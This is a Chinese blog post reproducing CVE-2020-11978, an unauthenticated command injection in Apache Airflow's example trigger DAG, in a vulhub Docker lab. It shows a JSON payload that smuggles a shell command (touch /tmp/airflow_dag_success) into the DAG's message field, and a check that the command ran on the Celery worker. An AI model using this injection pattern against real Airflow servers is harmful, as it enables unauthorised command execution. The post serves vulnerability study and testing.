CVE-2020-11978

Apache Airflow 示例dag中的命令注入（CVE-2020-11978）

Apache Airflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞，未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

漏洞复现

cd vulhub/airflow/CVE-2020-11978
#初始化数据库
docker-compose run airflow-init
docker-compose up -d

漏洞复现

访问http://10.10.10.8:8080进入airflow管理端，将example_trigger_dag前面的Off该为On：

再点击执行按钮，在Configuration JSON中输入：{"message":"'";touch /tmp/airflow_dag_success;#"}，再点Trigger执行dag：

等几秒可以看到执行成功：

到CeleryWorker容器中进行查看：

docker-compode exec airflow-worker ls -l /tmp

可以看到touch /tmp/airflow_dag_success成功被执行：

posted @ 2024-05-23 19:16 kalixcn 阅读(115) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CVE-2020-11981

· CVE-2020-17526

· Apache Airflow OS命令注入

· Apache Airflow < 2.4.0 example dag 远程代码执行漏洞（CVE-2022-40127）【WAF防护运营】

· Apache Spark UI 命令注入(CVE-2022-33891)漏洞复现

阅读排行：
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布：重大改进与新特性概览！
· AI与.NET技术实操系列（二）：开始使用ML.NET
· 单线程的Redis速度为什么快？

历史上的今天：
2023-05-23 Linux启动过程

公告

昵称： kalixcn
园龄： 1年10个月
粉丝： 1
关注： 6

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

阅读排行榜

评论排行榜

1. Hadoop YARN ResourceManager 未授权访问(1)

kalixcn

CVE-2020-11978

Apache Airflow 示例dag中的命令注入（CVE-2020-11978）

漏洞复现

漏洞复现

公告

搜索

常用链接

随笔分类

随笔档案

阅读排行榜

评论排行榜

推荐排行榜

最新评论